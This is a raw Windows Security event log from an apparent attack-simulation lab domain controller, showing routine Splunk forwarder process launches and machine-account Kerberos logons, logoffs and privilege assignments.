Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:39:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264839
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x13c8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:39:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264838
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x148c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:39:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264840
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x876089
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:39:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264843
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8792D6
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:39:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264842
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8792D6
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53744
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:39:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264841
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8792D6
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:40:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264844
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1648
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:40:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264846
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x14c4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:40:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264845
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x7ac
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:40:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264847
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xe78
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:40:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264848
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x18f4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:40:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264850
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x5f4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:40:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264849
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x670
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:40:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264853
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x87CC4C
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:40:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264852
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x87CC4C
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53758
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:40:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264851
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x87CC4C
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:41:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264854
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1650
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:41:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264856
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x920
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:41:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264855
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x16bc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:41:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264857
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x193c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:41:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264858
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xad0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:41:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264860
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x15b4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:41:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264859
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x980
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
